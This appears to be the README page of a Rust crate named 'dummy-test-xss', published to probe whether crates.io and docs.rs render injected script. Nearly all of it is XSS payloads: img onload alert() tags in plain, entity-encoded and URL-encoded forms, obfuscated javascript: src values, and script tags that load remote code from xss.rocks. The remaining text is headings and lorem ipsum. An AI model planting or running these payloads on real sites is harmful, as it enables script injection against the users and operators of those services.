dummy-test-xss 0.1.5

<img onload='alert('Injected 1234')' src='https://google.com'>&#x3C;img onload=&#x27;alert(&#x27;Injected 777&#x27;)&#x27; src=&#x27;https://google.com&#x27;&#x3E;%3Cimg%20onload%3D'alert('Injected%20666')'%20src%3D'https%3A%2F%2Fgoogle.com'%3E
Documentation

Testing for JS injection

Try a meta tag

This crate is just a test, I'm trying to find if cargo.io and/or docs.rs may be vulnerable to XSS.

Try to hover this image

Try to execute javascript with src attr in img tag

<img src=j&#X41vascript:alert('Injected from poisoned src from img tag in README.md')>

<IMG SRC=java\0script:alert("XSS")>

<SCRIPT/XSS SRC="http://xss.rocks/xss.js">

<SCRIPT/SRC="http://xss.rocks/xss.js">

<alert("XSS");//<

Try to click this anchor

Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.